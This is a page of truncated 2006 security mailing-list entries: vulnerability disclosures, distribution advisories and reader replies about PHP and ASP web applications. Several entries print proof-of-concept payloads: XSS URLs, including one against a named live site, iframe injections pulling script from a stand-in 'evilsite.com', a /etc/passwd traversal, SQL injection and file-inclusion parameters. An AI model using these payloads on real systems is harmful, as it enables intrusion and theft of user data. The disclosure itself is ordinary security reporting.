XSS Vulnerability On LarkinWEB Database Development, Web Site Design Marketing and Advertising System..

Runing HTML Codes, JScript etch...

XSS Vulerability URL : http://www.larkinweb.com/secure/error.asp?msg=[XSS]

Example:

http://www.larkinweb.com/secure/error.asp?msg=<script>window.locati

[ more ]  [ reply ]

DoS bug verified on FFox 1.5.0.4 under Windows XP SP2.

[ more ]  [ reply ]

*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ aWebNews <= 1.0 (login.php) Remote DocumentRoot file disclosure
*/ 04/06/2006 5:48

login.php: line 64-68,

Bug:

-- start --
if ($_GET['page'] == "") {
$pagetogo = "index.php";
} else {
$pagetogo = $_GET['page'];
}
-- end --

Proof of concept:

Open th

[ more ]  [ reply ]

~ TinyPHP forum v 3.6

# Local File Inclusion in "Profile.php"

# Coded By Hessam-x www.hessamx.net

~ Exploit:

http://www.milw0rm.com/exploits/1857

[ more ]  [ reply ]

This issue has been fixed in the SourceForge CVS repository (REL_1_0_0) and is included in the 1.0.4 release (released on 7 Jun 2006).

[ more ]  [ reply ]

This advisory is rather useless without the actual .reg file information. It's also rather asinine, since any content filter can be "bypassed" in this manner by simply encrypting a ZIP, RAR, or the archive of your choosing. This is the equivalent of saying "we have found a vulnerability in the Logit

[ more ]  [ reply ]

*/ Federico Fazzi, <federico (at) autistici (dot) org [email concealed]>
*/ BloggIT <= 1.01 (admin.php) Arbitrary code execution
*/ 04/06/2006 5:48

Bug:

The BloggIT have on the admin.php:

require("session.inc.php");
//- session_start();
//- if ($_SESSION['login'] != "ok") header("Location: index.php");

and require() functio

[ more ]  [ reply ]

################ Azhteam Digital Security Team #################

#

# showwish.asp

#

# Find by Soltan_defacer

# Greetings; s.defacer - azhteam - lvl3hr

#

#

# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Contact: soltan_defacer@xxxxxxxxx or http://www.azhteam.com

[ more ]  [ reply ]

All bugs have been fixed in release 1.11 (svn r353 - 2006-06-06).

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200606-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

Paul Schmehl said:

>This is the second "bug" I've seen in the past week that requires
>register_globals to be on. Yet register_globals has been off by
>default for the past four years.

But after a disclosure of a PHP issue with a functioning exploit, many
sites are regularly hacked soon afterwar

[ more ]  [ reply ]

Please update my advisory.

After posting up my advisory I have seen that 2 other php-files are also affected by this vulnerability.

Input passed to the "da_path" parameter in "auth.cookie.inc.php", "auth.header.inc.php" and

"auth.sessions.inc.php" is not properly verified, before it is used to

[ more ]  [ reply ]

0. Introduction
---------------

(from <http://www.boutell.com/gd/>)
GD is an open source code library for the dynamic creation of images by
programmers. GD is written in C, and "wrappers" are available for Perl,
PHP and other languages. GD creates PNG, JPEG and GIF images, among
other formats. GD i

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1090-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze
June 6th, 2006

[ more ]  [ reply ]

MailMarshal 6.1 SMTP MTA Content Filter Bypass

Vulnerability Type / Importance: Active Content Filter Bypass / High

Problem Discovered: 24 February 2006
Vendor Contacted: 24 February 2006
Advisory Published: 5 June 2006
-------------------------------------------------

Abstract:

Marshal MailMars

[ more ]  [ reply ]

The Asterisk Development Team today released Asterisk 1.2.9 and Asterisk
1.0.11 to address a security vulnerability in the IAX2 channel driver
(chan_iax2). The vulnerability affects all users with IAX2 clients that
might be compromised or used by a malicious user, and can lead to denial
of service a

[ more ]  [ reply ]

GANTTy v1.0.3

Homepage:

http://www.gantty.com

Effected files:

index.php

XSS Vulnerabilities PoC:

XSS Vulnerability:

http://www.example.com/index.php?action=login&message=<IMG SRC=javascript:alert('XSS')>+email&lang=

Full path disclosure error:

http://www.example.com/index.php?ac

[ more ]  [ reply ]

nukedx said:

>This is not vulnerable,PHP-Nuke having a special in their files and
>when includes mainfile.php it overwrites the global variables and it
>caused to make an arbitrary file inclusion.
>
>But in MyBloggie there is no common vulnerability like it.

In the source code for 2.1.1, many fil

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:095
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

ParticleSoft Wiki v1.0.2

Effected files:

input boxes on editing pages:

XSS Proof of concept:

We notice br tags are allowed, so by using a STYLE attribute using a comment to break up expression we can create a XSS vuln:

Put the following in when editing a page:

<br IMG STYLE="xss:ex

[ more ]  [ reply ]

ParticleSoft Whois v1.0.3

Homepage:

http://www.particlesoft.net/particlewhois/

XSS Proof of concept viaurl injection:

http://whois.particlesoft.net/index.php?do=runcheck&target="><iframe src=http://evilsite.com/scriptlet.html <<"&ext=all

XSS Via input box:

"><iframe src=http://evilsite.c

[ more ]  [ reply ]

Partial Links v1.2.2

Homepage:

http://www.particlesoft.net/particlelinks/

Effected files:

index.php

page_footer.php

admin.php

Exploits & Vulnerabilities:

Possible directory traversal?:

http://www.example.com/Other_Sites/X_%2526_Y/../../../../../etc/passwd/

SQL Injection:

http://

[ more ]  [ reply ]

Homepage:

http://www.particlesoft.net/particlegallery/

Effected files:

viewimage.php

viewalbum.php

SQL Injection:

http://www.example.com/viewimage.php?imageid='

XSS Vulnerability proof of concept:

http://www.example.com/viewimage.php?imageid=<iframe%20src=http://evilsi
te.com/scriptlet.

[ more ]  [ reply ]

Multiple file include exploits in Xtreme Downloads v.1.0

script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include

####################################################

exploits :

download.php

http://www.example.com/path/download.php?root=

[ more ]  [ reply ]